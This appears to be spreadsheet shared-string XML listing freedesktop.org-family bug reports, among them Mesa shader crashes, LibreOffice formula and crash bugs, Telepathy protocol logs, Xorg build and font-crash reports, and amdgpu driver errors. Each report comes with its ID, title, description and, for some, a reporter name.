  <si>
    <t>[Regression][Bisected] dEQP GLES 3 tests crash with node_for_deref: Assertion `idx num_children' failed</t>
  </si>
  <si>
    <t>Full list of tests that crash can be found here:
    https://mesa-ci.01.org/mesa_master/builds/17304/group/63a9f0ea7bb98050796b649e85481845#fails
Test output:
    Test case 'dEQP-GLES3.functional.transform_feedback.array.separate.points.lowp_mat4x2'..
    deqp-gles3: ../src/compiler/nir/nir_opt_find_array_copies.c:122: node_for_deref: 
    Assertion `idx num_children' failed.
Bisected to the following commit:
commit 156306e5e62fb4fda0e829c5798fffdf7eb1907c
Author: Connor Abbott 
Date:   Tue Jun 18 12:12:49 2019 +0200
    nir/find_array_copies: Handle wildcards and overlapping copies</t>
  </si>
  <si>
    <t>LIBREOFFICE-59583</t>
  </si>
  <si>
    <t>EDITING: Cannot use formula with user-defined function</t>
  </si>
  <si>
    <t>Created attachment 73282
spreadsheet with error
Problem description: 
If I try to enter a user-defined function with the same name as a column header into a cell a #Ref! error or Err.509 is issued
Steps to reproduce:
1. type =STERBENAME(A4) into a column of sheet Alsergrund of the attached spreadsheet
Current behavior:
After leaving the cell the formula is shown as ='Sterbename'(A4)
Expected behavior:
should recognize it as a function because by the parenthesis ()
Remarks:
I am using the German version. 
The spreadsheet has been generated by copying from a spreadsheet created with LO 3.x.
The working cells are the old ones.
Operating System: Windows 8
Version: 4.0.0.1 rc
Last worked in: 3.6.4.3 release</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-66898</t>
  </si>
  <si>
    <t>Creation of a new telepathy-qt-farstream repository</t>
  </si>
  <si>
    <t>Hello
this is a formal request for the creation of a new repository in the telepathy group telepathy-qt-farstream.
Please note that this is not a new project but a split of the existing telepathy-qt. At the moment the main telepathy-qt repository includes TelepathyQt-Farstream in the same tree. This is less than optimal for several reasons and adds complexity for packagers and distributors. The change is also aligned to telepathy-glib vs. telepathy-farstream.
Following the creation of the new repository telepathy-qt will be split and telepathy-qt-farstream will follow its own development cycle. The maintainers of telepathy-qt-farstream will be the same maintainers of telepathy-qt.
The decision has been approved and discussed at Akademy 2013.</t>
  </si>
  <si>
    <t>drf54321</t>
  </si>
  <si>
    <t>XORG-24060</t>
  </si>
  <si>
    <t>shave-libtool[61]: test: argument expected when building xserver</t>
  </si>
  <si>
    <t>Error shave-libtool[61]: test: argument when building xserver
I think it is better to add quotation marks into shave.in and shave-libtool.in
$ diff -u shave-libtool.in shave-libtool.in_mod
--- shave-libtool.in    Mon Sep 21 14:58:39 2009
+++ shave-libtool.in_mod        Mon Sep 21 15:25:08 2009
@@ -587 +587 @@
 lt_unmangle $lt_output
 output=$last_result
-if test -z $V then
+if test -z $V then
     if test $pass_though -eq 0 then
         echo $Q$output
     fi
$ diff -u shave.in shave.in_mod
--- shave.in    Mon Sep 21 14:58:39 2009
+++ shave.in_mod        Mon Sep 21 15:25:22 2009
@@ -757 +757 @@
 lt_unmangle $lt_output
 output=$last_result
-if test -z $V then
+if test -z $V then
     if test $pass_through -eq 0 then
         echo $Q$output
     fi
Or add #!/bin/bash instead of #!/bin/sh at the begining of the files</t>
  </si>
  <si>
    <t>YLitvinenko</t>
  </si>
  <si>
    <t>PORTLAND-36905</t>
  </si>
  <si>
    <t>Improve LXDE detection for xdg-open</t>
  </si>
  <si>
    <t>As reported in bug #36126 as a side note xdg-open is not able to detect a running LXDE session on my system (Linux Mint). I now stumbled over https://bugs.launchpad.net/ubuntu/+source/hardinfo/+bug/778148 where the same problem was reported for Lubuntu. According to the comments there it seems to be a good (i.e. robust) idea to look inside the environment variable $XDG_CURRENT_DESKTOP instead of $DESKTOP_SESSION. You perhaps want to change this just for the upcoming release in order to satisfy the growing LXDE user base. :-)</t>
  </si>
  <si>
    <t>urxmurx</t>
  </si>
  <si>
    <t>MESA-29565</t>
  </si>
  <si>
    <t>[glsl2] glcpp.h(52) : error C2061: syntax error : identifier 'intmax_t'</t>
  </si>
  <si>
    <t>mesa: 103453659dbb21dd49e700e4b6ba9aac83b5a3f4 (glsl2)
Build with MSVC.
intmax_t is part of stdint.h which isn't part of MSVC. Mesa has a copy of stdint.h in include/c99/stdint.h but it doesn't include a definition for intmax_t.
$ scons
...
glcpp.h(52) : error C2061: syntax error : identifier 'intmax_t'
src/glsl/glcpp/glcpp.h
    50  typedef union YYSTYPE
    51  {
    52          intmax_t ival
    53          char *str
    54          string_list_t *string_list
    55          token_t *token
    56          token_list_t *token_list
    57  } YYSTYPE</t>
  </si>
  <si>
    <t>TELEPATHY-14841</t>
  </si>
  <si>
    <t>Exception in _on_blob_received</t>
  </si>
  <si>
    <t>Sometimes I get this exception :
DEBUG:Transport:&lt;&lt;&lt; RNG 1004738827 207.46.27.50:1863 CKI 7167187.241206195 ***********@msn.com Pascal%20&amp;%20Isa U messenger.msn.com 1
DEBUG:Transport: Connecting to 207.46.27.50:1863
DEBUG:Transport:&gt;&gt;&gt; ANS 0 trapamoosch@hotmail.com 7167187.241206195 1004738827
DEBUG:Transport:&lt;&lt;&lt; IRO 0 1 1 ***********@msn.com Pascal%20&amp;%20Isa 2254295076
DEBUG:Transport:&lt;&lt;&lt; ANS 0 OK
DEBUG:Transport:&lt;&lt;&lt; MSG ***********@msn.com Pascal%20&amp;%20Isa
	MIME-Version: 1.0\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	P2P-Dest: trapamoosch@hotmail.com\r\n
	\r\n
	00 00 00 00 14 8a 2a 00 00 00 00 00 00 00 00 00
	92 02 00 00 00 00 00 00 92 02 00 00 00 00 00 00
	23 8a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00
	INVITE MSNMSGR:trapamoosch@hotmail.com MSNSLP/1.0\r\n
	To: \r\n
	From: \r\n
	Via: MSNSLP/1.0/TLP branch={20D6E368-1DD1-4FC1-B7F2-5F79C79290B2}\r\n
	CSeq: 0 \r\n
	Call-ID: {024FAC43-0E81-49C0-BA3C-CB363AA5B273}\r\n
	Max-Forwards: 0\r\n
	Content-Type: application/x-msnmsgr-sessionreqbody\r\n
	Content-Length: 308\r\n
	\r\n
	EUF-GUID: {A4268EEC-FEC5-49E5-95C3-F126696BDBF6}\r\n
	SessionID: 2785752\r\n
	SChannelState: 0\r\n
	Capabilities-Flags: 1\r\n
	AppID: 12\r\n
	Context: PG1zbm9iaiBDcmVhdG9yPSJ0cmFwYW1vb3NjaEBob3RtYWlsLmNvbSIgVHlwZT0iMyIgU0hBMUQ9IjR2eEJXdUZBVStCRkFzWTlOTVQ0RDV6M0ZPVT0iIFNpemU9IjExMTM4IiBMb2NhdGlvbj0iMCIgRnJpZW5kbHk9IiIvPgA=\r\n
	\r\n
	\x00
	00 00 00 00
INFO:protocol:switchboard_manager:New switchboard attached
WARNING:client:Unknown Switchboard Handler class 
DEBUG:Transport:&gt;&gt;&gt; MSG 1 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	00 00 00 00 ea e5 41 44 00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00
	14 8a 2a 00 23 8a 2a 00 92 02 00 00 00 00 00 00
	00 00 00 00
INFO:msnp2p:session-manager:blob has SLP (2785752):
INVITE MSNMSGR:trapamoosch@hotmail.com MSNSLP/1.0
To: 
From: 
Via: MSNSLP/1.0/TLP branch={20D6E368-1DD1-4FC1-B7F2-5F79C79290B2}
CSeq: 0 
Call-ID: {024FAC43-0E81-49C0-BA3C-CB363AA5B273}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-sessionreqbody
Content-Length: 309
EUF-GUID: {A4268EEC-FEC5-49E5-95C3-F126696BDBF6}
SessionID: 2785752
SChannelState: 0
Capabilities-Flags: 1
AppID: 12
Context: PG1zbm9iaiBDcmVhdG9yPSJ0cmFwYW1vb3NjaEBob3RtYWlsLmNvbSIgVHlwZT0iMyIgU0hBMUQ9IjR2eEJXdUZBVStCRkFzWTlOTVQ0RDV6M0ZPVT0iIFNpemU9IjExMTM4IiBMb2NhdGlvbj0iMCIgRnJpZW5kbHk9IiIvPgA=
INFO:msnp2p:session-manager:Creating new incomming session
DEBUG:Transport:&gt;&gt;&gt; MSG 2 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	00 00 00 00 26 62 ca 3f 00 00 00 00 00 00 00 00
	7c 01 00 00 00 00 00 00 7c 01 00 00 00 00 00 00
	2b 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	MSNSLP/1.0 200 OK\r\n
	To: \r\n
	From: \r\n
	Via: MSNSLP/1.0/TLP branch={20D6E368-1DD1-4FC1-B7F2-5F79C79290B2}\r\n
	CSeq: 1\r\n
	Call-ID: {024FAC43-0E81-49C0-BA3C-CB363AA5B273}\r\n
	Max-Forwards: 0\r\n
	Content-Type: application/x-msnmsgr-sessionreqbody\r\n
	Content-Length: 64\r\n
	\r\n
	SessionID: 2785752\r\n
	SChannelState: 0\r\n
	Capabilities-Flags: 1\r\n
	\r\n
	\x00
	00 00 00 0c
DEBUG:Transport:&gt;&gt;&gt; MSG 3 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 55 56 c0 5e 00 00 00 00 00 00 00 00
	04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
	2c 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	\x00\x00\x00\x00
	00 00 00 0c
DEBUG:Transport:&gt;&gt;&gt; MSG 4 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a 00 00 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	2d 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&gt;&gt;&gt; MSG 5 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a b2 04 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	2e 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&lt;&lt;&lt; ACK 1
DEBUG:Transport:&gt;&gt;&gt; MSG 6 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a 64 09 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	2f 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&gt;&gt;&gt; MSG 7 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a 16 0e 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	30 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&gt;&gt;&gt; MSG 8 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a c8 12 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	31 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&gt;&gt;&gt; MSG 9 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a 7a 17 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	32 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&gt;&gt;&gt; MSG 10 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a 2c 1c 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	33 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&lt;&lt;&lt; ACK 2
DEBUG:Transport:&lt;&lt;&lt; ACK 3
DEBUG:Transport:&lt;&lt;&lt; ACK 4
DEBUG:Transport:&gt;&gt;&gt; MSG 11 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a de 20 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	34 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&lt;&lt;&lt; ACK 5
DEBUG:Transport:&gt;&gt;&gt; MSG 12 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a 90 25 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 b2 04 00 00 20 00 00 00
	35 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[1202 bytes of data]
	00 00 00 0c
DEBUG:Transport:&gt;&gt;&gt; MSG 13 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	d8 81 2a 00 16 c4 64 3a 42 2a 00 00 00 00 00 00
	82 2b 00 00 00 00 00 00 40 01 00 00 20 00 00 00
	36 88 79 17 00 00 00 00 00 00 00 00 00 00 00 00
	[320 bytes of data]
	00 00 00 0c
DEBUG:Transport:&lt;&lt;&lt; MSG ***********@msn.com Pascal%20&amp;%20Isa
	MIME-Version: 1.0\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	P2P-Dest: trapamoosch@hotmail.com\r\n
	\r\n
	00 00 00 00 16 8a 2a 00 00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00
	26 62 ca 3f 2b 88 79 17 7c 01 00 00 00 00 00 00
	00 00 00 0c
DEBUG:Transport:&lt;&lt;&lt; ACK 6
DEBUG:Transport:&lt;&lt;&lt; ACK 7
DEBUG:Transport:&lt;&lt;&lt; ACK 8
DEBUG:Transport:&lt;&lt;&lt; ACK 9
DEBUG:Transport:&lt;&lt;&lt; ACK 10
DEBUG:Transport:&lt;&lt;&lt; MSG ***********@msn.com Pascal%20&amp;%20Isa
	MIME-Version: 1.0\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	P2P-Dest: trapamoosch@hotmail.com\r\n
	\r\n
	00 00 00 00 15 8a 2a 00 00 00 00 00 00 00 00 00
	64 02 00 00 00 00 00 00 64 02 00 00 00 00 00 00
	b3 8c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00
	INVITE MSNMSGR:trapamoosch@hotmail.com MSNSLP/1.0\r\n
	To: \r\n
	From: \r\n
	Via: MSNSLP/1.0/TLP branch={645B65DA-4830-49BE-B4D4-F8E3842259B2}\r\n
	CSeq: 0 \r\n
	Call-ID: {024FAC43-0E81-49C0-BA3C-CB363AA5B273}\r\n
	Max-Forwards: 0\r\n
	Content-Type: application/x-msnmsgr-transreqbody\r\n
	Content-Length: 264\r\n
	\r\n
	Bridges: TRUDPv1 TCPv1 SBBridge TURNv1\r\n
	NetID: -405091507\r\n
	Conn-Type: Port-Restrict-NAT\r\n
	TCP-Conn-Type: Symmetric-NAT\r\n
	UPnPNat: true\r\n
	ICF: false\r\n
	Hashed-Nonce: {A676D929-9DC8-43B4-26FD-1ABD640F28F4}\r\n
	SessionID: 2785752\r\n
	SChannelState: 0\r\n
	Capabilities-Flags: 1\r\n
	\r\n
	\x00
	00 00 00 00
DEBUG:Transport:&gt;&gt;&gt; MSG 14 D
	P2P-Dest: ***********@msn.com\r\n
	Content-Type: application/x-msnmsgrp2p\r\n
	\r\n
	00 00 00 00 24 9b eb 65 00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00
	15 8a 2a 00 b3 8c 2a 00 64 02 00 00 00 00 00 00
	00 00 00 00
INFO:msnp2p:session-manager:blob has SLP (2785752):
INVITE MSNMSGR:trapamoosch@hotmail.com MSNSLP/1.0
To: 
From: 
Via: MSNSLP/1.0/TLP branch={645B65DA-4830-49BE-B4D4-F8E3842259B2}
CSeq: 0 
Call-ID: {024FAC43-0E81-49C0-BA3C-CB363AA5B273}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transreqbody
Content-Length: 265
Bridges: TRUDPv1 TCPv1 SBBridge TURNv1
NetID: -405091507
Conn-Type: Port-Restrict-NAT
TCP-Conn-Type: Symmetric-NAT
UPnPNat: true
ICF: false
Hashed-Nonce: {A676D929-9DC8-43B4-26FD-1ABD640F28F4}
SessionID: 2785752
SChannelState: 0
Capabilities-Flags: 1
Traceback (most recent call last):
  File /home/trapamoosch/open-live-messenger/pymsn/msnp2p/session_manager.py line 52 in 
    lambda tr blob: self._on_blob_received(blob))
  File /home/trapamoosch/open-live-messenger/pymsn/msnp2p/session_manager.py line 163 in _on_blob_received
    session._on_blob_received(blob)
AttributeError: 'NoneType' object has no attribute '_on_blob_received'</t>
  </si>
  <si>
    <t>TELEPATHY-31763</t>
  </si>
  <si>
    <t>Test trivia from Haze</t>
  </si>
  <si>
    <t>I synced Gabble's test infrastructure into Haze found some issues with it and fixed them.
Here's a branch syncing the fixes back.</t>
  </si>
  <si>
    <t>LIBREOFFICE-68089</t>
  </si>
  <si>
    <t>can't open .xls file</t>
  </si>
  <si>
    <t>Created attachment 84039
This file could not be opened normally
Problem description: 
Steps to reproduce:
1. CPU up 50%.
2. ....
3. ....
Current behavior:
Expected behavior:
Operating System: Windows 8
Version: 4.1.0.4 release</t>
  </si>
  <si>
    <t>vbz276</t>
  </si>
  <si>
    <t>LIBREOFFICE-33994</t>
  </si>
  <si>
    <t>LibreOffice vanishes while exploring a configmanager setting in basic IDE</t>
  </si>
  <si>
    <t>Created attachment 43035
file containing macro that reproduces crash
a crash !
playing with createUnoService( com.sun.star.configuration.ConfigurationProvider )
in the attached document
put a break point at the line 
noms = 	sources.elementnames()
launch nettoyerSourcesDeDonnees (press F5)
at break point lower left pane explore the variable aSettings
--&gt; badaboum crash</t>
  </si>
  <si>
    <t>lgodard.libre</t>
  </si>
  <si>
    <t>TELEPATHY-30836</t>
  </si>
  <si>
    <t>Use XEP-0186 invisibility when available</t>
  </si>
  <si>
    <t>Currently Gabble will use XEP-0126 (privacy list) invisibility on a server that supports both XEP-0186 and privacy lists.
Arguably XEP-0186 should be used when it is available for simple invisibility as it is a straightforward and fool-proof protocol.
Also once Google Shared Status is introduced it will need to take precedence over XEP-0126 as well (as it does not interop well with other invisibility methods).</t>
  </si>
  <si>
    <t>DRI-91029</t>
  </si>
  <si>
    <t>[BDW regression]System starts fail with two monitors</t>
  </si>
  <si>
    <t>Created attachment 116593
dmesg info
==System Environment==       
-----------------------------------------------------
Regression: Yes
Drm-intel-next-queued branch:
Good commit: 2441f8779e886d74389bf78aad149dc99876a900
Bad  commit: 2da44aae8144b8380f4e45688e570d4c7a4ef2c4
Non-working platforms: BDW
==Kernel==
--------------------------------------------------
commit 186047de2f57b1ed4d1bd52f824b88b25275d378
Author: Daniel Vetter 
Date:   Thu Jun 18 18:47:12 2015 +0200
drm-intel-nightly: 2015y-06m-18d-16h-46m-34s UTC integration manifest
==Bug detailed description==
--------------------------------------------------
System starts fail with two monitors on BDW with the latest drm-intel-nightly branch kernel
It does not exist on latest drm-intel-fixes and drm-intel-next-fixes branch kernel.
==Reproduce steps==
----------------------------
1 Connect two monitors
2 Start machine</t>
  </si>
  <si>
    <t>TELEPATHY-22023</t>
  </si>
  <si>
    <t>vcard/test-vcard-race.py is racy</t>
  </si>
  <si>
    <t>Traceback (most recent call last):
  File /home/wjt/src/telepathy/gabble/tests/twisted/gabbletest.py line 381 in exec_test_deferred
    f(queue bus conn stream)
  File ./vcard/test-vcard-race.py line 55 in test
    expect_and_handle_set_vcard(q stream has_nickname_and_photo)
  File /home/wjt/src/telepathy/gabble/tests/twisted/gabbletest.py line 430 in expect_and_handle_set_vcard
    query_name='vCard' iq_type='set')
  File /home/wjt/src/telepathy/gabble/tests/twisted/servicetest.py line 114 in expect
    event = self.wait()
  File /home/wjt/src/telepathy/gabble/tests/twisted/servicetest.py line 187 in wait
    raise TimeoutError
TimeoutError
FAIL: vcard/test-vcard-race.py</t>
  </si>
  <si>
    <t>LIBXKBCOMMON-67654</t>
  </si>
  <si>
    <t>Fails to parse a keymap retrieved from XQuartz</t>
  </si>
  <si>
    <t>Created attachment 83506
the keymap
xkbcommon fails to parse a kaymap retrieved from XQuartz (Apple Inc.'s version of the X server) when runing a xkbcommon based application in X session from Mac to Ubuntu.
The keymap: http://pastebin.com/nxVL9h5t
X tool 'xkbcomp' accepts it but xkbcommon fails with a following message:
Error: Failed to compile xkb_symbols
Error: Failed to compile keymap</t>
  </si>
  <si>
    <t>XORG-59044</t>
  </si>
  <si>
    <t>[UXA IVB bisected] gnome-system-monitor perforamnce reduce by ~40%</t>
  </si>
  <si>
    <t>System Environment:       
----------------------------------------------
Platform:IVB
Mesa:  (9.0)0ac90296a092f846647812318913b0e492775f31
Cairo: (master)9dde964553f74ccbc037b13ca83d0abb46adb194
Kernel:(drm-intel-fixes) da494d7ca5e0a1afca3480826b5060e15c951e80
Bug detailed description:
----------------------------------------------
Cairo (benchmark/full)gnome-system-monitor performance reduced by ~40% on IVB
It's cairo regression. By bisected show that 5bc1b1f6a is the first bad commit.
commit 5bc1b1f6aac108d9a3963352ad774bb4fcd69e28
Author: Chris Wilson 
Date:   Fri Aug 24 17:22:34 2012 +0100
   stroke: Make the incremental trapezoid stroker optionally available again
Performance:
-----------------------------------------------
74941f8 is 5bc1b1 parents commit.
                                74941f8   5bc1b1 
(benchmark)gnome-system-monitor  0.97      1.62
Reproduce steps:
---------------------------------------------
1 xinit&amp;
2 vblank_mode=0 CAIRO_TEST_TARGET=xlib ./cairo-perf-trace ../benchmark/gnome-system-monitor</t>
  </si>
  <si>
    <t>XORG-7535</t>
  </si>
  <si>
    <t>Freetype2 pcf font problem also affects libXfont</t>
  </si>
  <si>
    <t>From Marcus Meissner:
Not sure if you got this report already.
Matthew Barnes of Redhat reported a freetype2 crash which Werner
Lemberg of freetype2 also thought affects X own PCF reader.
I confirmed this my X.Org server crashes as soon as I (as
the logged in X user) do:
	xset +fp ~/badfont/
	xfontsel
with a SIGSEGV in strlen().
It is unclear if this problem can be exploited to execute code (it
crashes in a strlen() for me) but a crashing X server is not good either.
Werner Lemberg of freetype2 also writes:
BTW I've looked into the code of XFree86 4.3.0 (this is what I've
unpacked at home) and I see that there's virtually no protection against
malformed PCF -- our PCF developer originally took most of the code from
 xc/lib/font/bitmap/pcfread.c
Confirmed here.</t>
  </si>
  <si>
    <t>MESA-40609</t>
  </si>
  <si>
    <t>[llvmpipe] piglit glsl-array-bounds-0[26] failure on 64-bit and fbo</t>
  </si>
  <si>
    <t>mesa: 0a00a9a05b357dafae86bf8af879aa601f101eba (master)
The piglit glsl-array-bounds-02 and glsl-array-bounds-06 tests with the -fbo option fail on 64-bit llvmpipe.
The tests pass when run without the -fbo option.
The tests pass when run on 32-bit llvmpipe.
The tests pass on swrast.
The tests pass on sofpipe.
$ ./bin/shader_runner tests/shaders/glsl-array-bounds-02.shader_test -fbo
Probe at (1515)
  Expected: 0.000000 1.000000 0.000000
  Observed: 1.000000 0.000000 0.000000
PIGLIT: {'result': 'fail' }</t>
  </si>
  <si>
    <t>REALMD-100466</t>
  </si>
  <si>
    <t>adcli info sometimes SEGV</t>
  </si>
  <si>
    <t>Created attachment 130565
Fix adcli SEGV
adcli git SEGVs occasionally due to NULL ptr access. This patch fixes it.</t>
  </si>
  <si>
    <t>joakim.tjernlund</t>
  </si>
  <si>
    <t>MESA-50058</t>
  </si>
  <si>
    <t>[NV86] All OpenGL programs crashing with nouveau dri</t>
  </si>
  <si>
    <t>Created attachment 61754
glxinfo backtrace
All programs which use OpenGL are crashing with nouveau dri llvmpipe works fine. You can find glxinfo backtrace in the attached file. Please tell me if any other traces/info is needed to fix the issue.
01:00.0 VGA compatible controller: NVIDIA Corporation G86 [GeForce 8400M GS] (rev a1)
mesa-git (rev 03e3bc4 gallium/auxiliary/pipe-loader: Fix usage of anonymous union.)
libdrm-git (rev 481234f radeon: Add Southern Islands PCI IDs.)
xf86-video-noveau-git (rev 581564 dri2: Don't try to page-flip pixmaps (fdo bug 49351).)
X version 1.12.1.901
kernel-3.2.6</t>
  </si>
  <si>
    <t>anonymous</t>
  </si>
  <si>
    <t>MESA-39156</t>
  </si>
  <si>
    <t>[r600g] minor glyph corruption seen in Second Life</t>
  </si>
  <si>
    <t>Created attachment 48991
Image showing glyph corruption 
This is seen in git master but also in 7.10/7.11.
Pixels are cut off below gylphs in some letters.
See attach screenshot for corruption.</t>
  </si>
  <si>
    <t>TELEPATHY-49593</t>
  </si>
  <si>
    <t>stop Haze using deprecated things</t>
  </si>
  <si>
    <t>With the patches here Haze can pass tests with CPPFLAGS=-DTP_DISABLE_DEPRECATED. (For the 'next' branch you still have to --disable-media though.)</t>
  </si>
  <si>
    <t>XORG-85016</t>
  </si>
  <si>
    <t>xorg.conf.d/50-monitor.conf xorg.conf &amp; EDID preferred are ignored</t>
  </si>
  <si>
    <t>Created attachment 107835
845G Xorg.0.log following no attempt to configure via /etc/X11/
openSUSE 13.2 (solution/workaround found on 865 host gx270):
3.0.0git-199.1 installed 13 July OK
2.99.916-139.1 (24 Sept)  broken
2.99.916-2.2  (current) broken
3.0.0git-216.1 OK
Mageia Cauldron (845 host t2240):
2.99.916-2 broken
Fedora 21 ( 945 host gx62b):
2.99.916-2 broken
Failures are on 845G 865G 915G 945G and 4000 hosts using current and older 2.99.9xx versions. I discovered git works on 865G then tried it on others. I'm unable to reproduce using Radeon rv200 or rv380.
I can make X start with desired resolution and DPI via xrandr commands in a startup script but trying equivalent via xorg.conf.d/ or xorg.conf PreferredMode and DisplaySize are ignored. Omitting any configuration attempt produces 1024x768 instead of EDID preferred.
Possibly 'Option AccelMethod UXA' is also ignored. I can't tell because Fedora's X is freezing my 845 machines.</t>
  </si>
  <si>
    <t>DRI-108729</t>
  </si>
  <si>
    <t>[Kaveri CIK 7400K] [regression works on radeon] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!</t>
  </si>
  <si>
    <t>Same Kaveri 7400K as in bug 99353 so this is a regression.
[    0.000000] Command line: BOOT_IMAGE=/vmlinuz-4.18.18-300.fc29.x86_64 root=UUID=6721d330-05e1-4b6d-a862-ccc514fd41ff ro rhgb quiet radeon.cik_support=0 amdgpu.cik_support=1 LANG=hr_HR.UTF-8
[    0.000000] Kernel command line: BOOT_IMAGE=/vmlinuz-4.18.18-300.fc29.x86_64 root=UUID=6721d330-05e1-4b6d-a862-ccc514fd41ff ro rhgb quiet radeon.cik_support=0 amdgpu.cik_support=1
LANG=hr_HR.UTF-8
[    1.958265] [drm] radeon kernel modesetting enabled.
[    1.958322] fb: switching to radeondrmfb from EFI VGA
[    1.959264] radeon 0000:00:01.0: CIK support disabled by module param
[    2.149551] [drm] amdgpu kernel modesetting enabled.
[    2.184243] amdgpu 0000:00:01.0: VRAM: 512M 0x000000F400000000 - 0x000000F41FFFFFFF (512M used)                                                                                    
[    2.184245] amdgpu 0000:00:01.0: GTT: 1024M 0x0000000000000000 - 0x000000003FFFFFFF
[    2.184371] [drm] amdgpu: 512M of VRAM memory ready
[    2.184372] [drm] amdgpu: 2546M of GTT memory ready.
[    2.184494] [drm] amdgpu: dpm initialized
[    2.544367] [drm] Initialized amdgpu 3.26.0 20150101 for 0000:00:01.0 on minor 0
[    5.693549] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[    6.713708] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[    7.733862] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[    8.753952] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[    9.774041] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[   10.794129] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[   11.814217] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[   12.834303] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[   13.854390] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[   14.874478] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding trying to reset the ECPU!!!                                                                                  
[   14.894517] [drm:vce_v2_0_start [amdgpu]] *ERROR* VCE not responding giving up!!!
[   14.894553] [drm:amdgpu_device_ip_set_powergating_state [amdgpu]] *ERROR* set_powergating_state of IP block  failed -110                                                 
[   15.904117] [drm:amdgpu_vce_ring_test_ib [amdgpu]] *ERROR* amdgpu: IB test timed out.
